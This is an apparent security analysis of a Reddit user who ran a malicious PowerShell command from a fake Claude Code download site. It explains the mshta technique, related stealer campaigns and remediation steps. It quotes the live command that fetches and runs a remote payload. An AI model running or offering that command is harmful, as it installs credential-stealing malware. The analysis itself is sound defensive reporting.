potential virus?

Detailed Analysis

A Reddit user's account of attempting to download Claude Code and inadvertently running a suspicious PowerShell command illustrates a textbook example of a social engineering attack targeting users of Anthropic's AI tools. The user searched for Claude Code, landed on a fraudulent site — cladesktop.gitlab.io — and was instructed to execute `mshta https://desktop-version.com/app` in PowerShell. The `mshta` command (Microsoft HTML Application Host) is a well-documented attack vector routinely exploited by malware distributors because it can silently execute remote scripts under the guise of a routine application process. The user compounded their exposure by re-running the command with administrator privileges, which, if the payload had executed successfully, would have granted the malicious code the highest level of system access possible on a Windows machine. The blank screen and non-opening file the user observed are consistent either with a failed payload delivery or with a silent background execution that completed without visible output — neither outcome should be interpreted as proof that the system is clean.

This incident sits squarely within a broader wave of threat activity that followed Anthropic's accidental exposure of the Claude Code source code in late March 2026. When a JavaScript source map file in a public npm package revealed approximately 513,000 lines of the tool's TypeScript codebase, threat actors rapidly capitalized on the resulting public interest in Claude Code by seeding fake repositories and fraudulent download sites with trojanized packages. Security researchers at Zscaler and Trend Micro have documented malware families including Vidar, GhostSocks, and PureLog Stealer being distributed through these counterfeit Claude Code channels. The attack pattern described in the Reddit post — a lookalike domain, an urgent command-line instruction, and an obfuscated remote payload — is consistent with those documented campaigns, which are specifically engineered to exploit users who are unfamiliar with how legitimate software distribution works.

The specific mechanics of the attack deserve scrutiny. The `mshta` binary is a signed Windows executable, meaning it bypasses many basic security filters that would flag an unknown `.exe` file. Directing it at a remote URL allows attackers to serve dynamic payloads that can be swapped or updated without changing the original lure. The fact that the user observed only a brief blank window does not confirm failure; many modern stealers and trojans are designed to operate entirely in the background, exfiltrating browser credentials, session tokens, cryptocurrency wallets, and stored passwords before the user notices anything unusual. PureLog Stealer, one of the families linked to these campaigns, is specifically built for silent credential harvesting from browsers and application keystores.

The broader trend this incident reflects is the systematic exploitation of AI tool adoption curves. As Anthropic's products — particularly developer-facing tools like Claude Code — grow in popularity, they become increasingly attractive lures for threat actors. Legitimate software distribution for Claude Code occurs exclusively through Anthropic's official channels and verified npm packages, not through GitLab pages or commands that fetch remote scripts via `mshta`. The user's experience underscores a critical gap: the rapid mainstream adoption of AI coding tools is outpacing user awareness of how those tools are actually distributed and installed. Anthropic has publicly recommended Zero Trust architecture and careful verification of package sources, but these recommendations presuppose a level of technical literacy that many new users do not yet possess.

For the user in question, the appropriate immediate steps would be to run a full system scan with a reputable anti-malware tool, change all passwords stored in browsers or password managers from a separate, unaffected device, revoke any active session tokens for sensitive accounts, and monitor financial accounts for unauthorized activity. The ambiguous outcome — a file that would not open and a brief blank PowerShell window — is not reassuring evidence of a failed attack. It is, instead, consistent with how the most effective modern malware operates: quietly, quickly, and without drawing attention to itself.